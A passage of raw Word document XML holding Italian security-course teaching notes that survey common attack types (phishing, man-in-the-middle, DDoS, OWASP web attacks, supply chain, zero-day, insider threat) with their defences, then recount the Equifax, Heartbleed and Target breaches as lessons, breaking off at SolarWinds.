        <w:t xml:space="preserve">: phishing mirato a una persona specifica (più personalizzato).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Whaling</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: spear phishing al CEO/CFO.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Vishing</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: phishing telefonico.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Smishing</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: phishing via SMS.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Pretexting</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: l’attaccante si finge un collega/tecnico per ottenere info.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Baiting</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: lasciare USB infette nel parcheggio aziendale.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Difesa</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: formazione utenti, MFA (anche se la password viene rubata, l’attaccante non ha il secondo fattore), email filtering.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="26"/>
    <w:bookmarkStart w:id="27" w:name="man-in-the-middle-mitm"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Titolo4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3. Man-in-the-Middle (MITM)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">L’attaccante si interpone tra due comunicanti. Vede e/o modifica i messaggi.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tecniche: ARP spoofing (M2), DNS spoofing, Wi-Fi rogue (rete fake</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“Free WiFi”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">all’aeroporto), certificate spoofing.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Difesa</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: HTTPS con certificate pinning, HSTS, VPN aziendale, Wi-Fi solo trusted.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="27"/>
    <w:bookmarkStart w:id="28" w:name="dos-ddos"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Titolo4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4. DoS / DDoS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Rendere indisponibile il servizio. Volumetrico (saturare banda) o applicativo (esaurire risorse server).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">DDoS =</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“distributed”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, da migliaia di macchine (botnet).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Difesa</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: rate limiting, anti-DDoS (Cloudflare, AWS Shield), architettura scalabile.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="28"/>
    <w:bookmarkStart w:id="29" w:name="web-application-attacks"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Titolo4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5. Web Application Attacks</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Il cuore di questo corso. Sono i 10 della</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">OWASP Top 10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SQL Injection (M6.2)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1003"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Broken Access Control / IDOR (M6.3)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1003"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Cryptographic Failures (M6.4)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1003"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Cross-Site Scripting / XSS (M6.5)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1003"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Vulnerable Components / Supply Chain (M6.6)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1003"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Path Traversal (M6.7)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1003"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Server-Side Request Forgery (SSRF)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1003"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">CSRF</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1003"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Insecure Deserialization</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1003"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Security Misconfiguration</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Li vedremo tutti (i primi 5 in profondità).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Difesa</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: codice sicuro. Punto. Il WAF aiuta ma non basta.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="29"/>
    <w:bookmarkStart w:id="30" w:name="supply-chain-attacks"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Titolo4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">6. Supply Chain Attacks</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Compromettere il software a monte: una libreria che migliaia di aziende usano.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Casi: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SolarWinds 2020</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: malware in un aggiornamento di Orion. ~18000 organizzazioni infette.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Log4Shell 2021</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: vulnerabilità in Log4j (libreria Java ovunque). CVSS 10.0.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XZ Utils 2024</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: backdoor in una libreria di compressione, scoperta per caso prima del rilascio massivo.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Difesa</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: SBOM, dependency scanning, verifica firme, principio di</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“minimo numero di dipendenze”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="30"/>
    <w:bookmarkStart w:id="31" w:name="zero-day"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Titolo4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">7. Zero-Day</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Vulnerabilità sconosciuta al vendor (e quindi senza patch). L’attaccante la sfrutta prima che la community la scopra.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Mercato: i broker di zero-day pagano centinaia di migliaia di dollari per vulnerabilità ad alto impatto (es. iOS RCE).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Difesa</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: difese in profondità, monitoring, patching rapido</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">dopo la disclosure</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="31"/>
    <w:bookmarkStart w:id="32" w:name="insider-threat"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Titolo4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">8. Insider Threat</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Minaccia che viene da dentro. Dipendente scontento, ex-dipendente con credenziali ancora attive, infiltrato.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Casi: Edward Snowden 2013 (esfiltrazione massiva NSA), molti casi di sabotaggio post-licenziamento.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Difesa</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: least privilege rigoroso, separation of duties, revoca tempestiva accessi, monitoring comportamentale.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="32"/>
    <w:bookmarkEnd w:id="33"/>
    <w:bookmarkStart w:id="34" w:name="tabella-riassuntiva"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Titolo3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3.2 Tabella riassuntiva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Vettore</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Bersaglio tipico</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Difesa primaria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Malware</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Email, USB, drive-by</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Endpoint utente</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Antivirus, EDR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Phishing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Email/SMS/voce</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Persone</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Formazione, MFA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MITM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Rete</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Comunicazioni</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">HTTPS, VPN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DoS/DDoS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Rete</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Servizio</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Rate limit, anti-DDoS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Applicazioni</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Codice sicuro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</w:pPr>
            <w:r>
              <w:t xml:space="preserve">Dipendenze</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Tutti</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">SBOM, scanning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Zero-Day</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Variabile</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Variabile</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Defense in 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Insider</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Accesso legittimo</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Dati interni</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Least priv, audit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4 — Cinque casi reali</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Quanto ci vorrà: 30 minuti. Storytelling, niente diapositive.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Questi 5 casi vanno raccontati come</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">storie</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, non come liste di fatti. Per ognuno: cosa è successo, come è successo, cosa si poteva fare.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="34"/>
    <w:bookmarkStart w:id="35" w:name="equifax-2017-147-milioni-di-record"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Titolo3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4.1 Equifax 2017 — 147 milioni di record</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Cosa è successo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Equifax (agenzia di credito USA) subisce un attacco tra maggio e luglio 2017. Rubati nomi, SSN, date di nascita, indirizzi, in alcuni casi numeri di carta.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Come è successo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Apache Struts (framework Java) aveva CVE-2017-5638 con CVSS 10.0, patchata a marzo 2017. Equifax non ha installato la patch per ~2 mesi.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Cosa si poteva fare</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Inventario centrale delle dipendenze (SBOM).</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Processo automatico di scansione vulnerabilità.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Patching SLA per CVE critiche (es. ≤7 giorni per CVSS ≥9.0).</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Network segmentation (anche penetrato il front-end, l’attaccante non sarebbe arrivato al DB).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Lezione</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: la sicurezza non è il momento dell’attacco, è la routine quotidiana che ti tiene aggiornato.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="35"/>
    <w:bookmarkStart w:id="36" w:name="heartbleed-2014-la-libreria-di-tutti"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Titolo3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4.2 Heartbleed 2014 — la libreria di tutti</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Cosa è successo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: bug in OpenSSL (CVE-2014-0160,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“Heartbleed”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) permetteva di leggere 64KB di memoria del server per ogni richiesta. Tra cui chiavi private, password in chiaro, sessioni.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Come è successo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: bug nel codice di OpenSSL — mancato controllo della lunghezza nel</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“heartbeat”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">TLS. La memoria che doveva tornare era 16 bytes, l’attaccante chiedeva 64KB e il server li dava.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Impatto</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: ~17% dei server HTTPS al mondo (mezzo milione+). Yahoo, Pinterest, Reddit, persino Canada Revenue Agency.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Cosa si poteva fare</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Code review accurato (open source, ma poche persone leggevano OpenSSL davvero).</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Fuzzing automatizzato (avrebbe trovato il bug).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Diversificazione</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: non tutto su OpenSSL. Esistevano alternative (BoringSSL, LibreSSL nato proprio dopo Heartbleed).</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Memoria sicura: linguaggi che non permettono questo tipo di overflow (Rust, Go).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Lezione</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: una libreria usata da tutti è un single point of failure colossale.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="36"/>
    <w:bookmarkStart w:id="37" w:name="target-2013-il-fornitore-hvac"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Titolo3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4.3 Target 2013 — il fornitore HVAC</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Cosa è successo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Target (catena retail USA) si fa rubare 40M numeri di carta + 70M record di clienti durante il Black Friday 2013.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Come è successo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: l’attaccante non ha bucato Target direttamente. Ha bucato</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">un fornitore HVAC</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(climatizzazione) che aveva accesso di rete a Target per il monitoraggio remoto. Da lì ha pivotato fino ai POS dei negozi e installato malware che leggeva le carte mentre venivano strisciate.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Cosa si poteva fare</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Network segmentation: il sistema HVAC</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">non doveva</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">poter parlare con la rete dei POS.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Least privilege per i fornitori.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- MFA sui canali di accesso esterni.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Monitoring del traffico est-ovest (laterale).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Lezione</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: il tuo perimetro è grande quanto il perimetro del tuo fornitore più debole.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="37"/>
    <w:bookmarkStart w:id="38" w:name="solarwinds-2020-la-supply-chain"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Titolo3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4.4 SolarWinds 2020 — la supply chain</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Cosa è successo</w:t>
      </w:r>
      <w:r>
